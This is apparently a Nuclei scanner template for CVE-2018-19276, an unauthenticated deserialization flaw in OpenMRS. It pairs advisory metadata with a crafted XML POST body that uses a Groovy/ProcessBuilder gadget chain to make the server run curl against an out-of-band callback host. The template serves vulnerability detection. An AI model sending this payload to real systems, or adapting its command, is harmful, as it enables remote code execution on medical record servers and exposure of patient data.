id: CVE-2018-19276

info:
  name: OpenMRS Platform < 2.24.0 - Insecure Object Deserialization
  author: DhiyaneshDK
  severity: critical
  description: |
    OpenMRS before 2.24.0 is affected by an Insecure Object Deserialization vulnerability that allows an unauthenticated user to execute arbitrary commands on the targeted system via crafted XML data in a request body.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands via insecure object deserialization, leading to complete server compromise and access to sensitive patient data.
  remediation: |
    Upgrade to OpenMRS Platform version 2.24.0 or later.
  reference:
    - http://packetstormsecurity.com/files/155691/OpenMRS-Java-Deserialization-Remote-Code-Execution.html
    - https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19276
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-19276
    cwe-id: CWE-502
    epss-score: 0.93328
    epss-percentile: 0.99819
    cpe: cpe:2.3:a:openmrs:openmrs:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: openmrs
    product: openmrs
    shodan-query: html:"OpenMRS"
  tags: cve,cve2018,openmrs,deserialization,rce,vkev,vuln

http:
  - raw:
      - |
        POST {{path}}/ws/rest/v1/xxxxxx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <map>
          <entry>
            <groovy.util.Expando>
              <expandoProperties>
                <entry>
                  <string>hashCode</string>
                  <org.codehaus.groovy.runtime.MethodClosure>
                    <delegate class="java.lang.ProcessBuilder">
                      <command>
                        <string>curl</string><string>{{interactsh-url}}</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </delegate>
                    <owner class="java.lang.ProcessBuilder" reference="../delegate"/>
                    <resolveStrategy>0</resolveStrategy>
                    <directive>0</directive>
                    <parameterTypes/>
                    <maximumNumberOfParameters>0</maximumNumberOfParameters>
                    <method>start</method>
                  </org.codehaus.groovy.runtime.MethodClosure>
                </entry>
              </expandoProperties>
            </groovy.util.Expando>
            <int>1337</int>
          </entry>
        </map>

    payloads:
      path:
        - ""
        - "/openmrs"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "message\":")'
        condition: and
# digest: 4a0a0047304502207ababd7726d11703aebc4ba823d55f4d9805d0bf4c4e1b6a6d4f44e60ec311bd022100e88dc8c3272498144a3dd849950a3f0d5ca55d6837362c5370c32d1eef0fa5d6:922c64590222798bb761d5b6d8e72950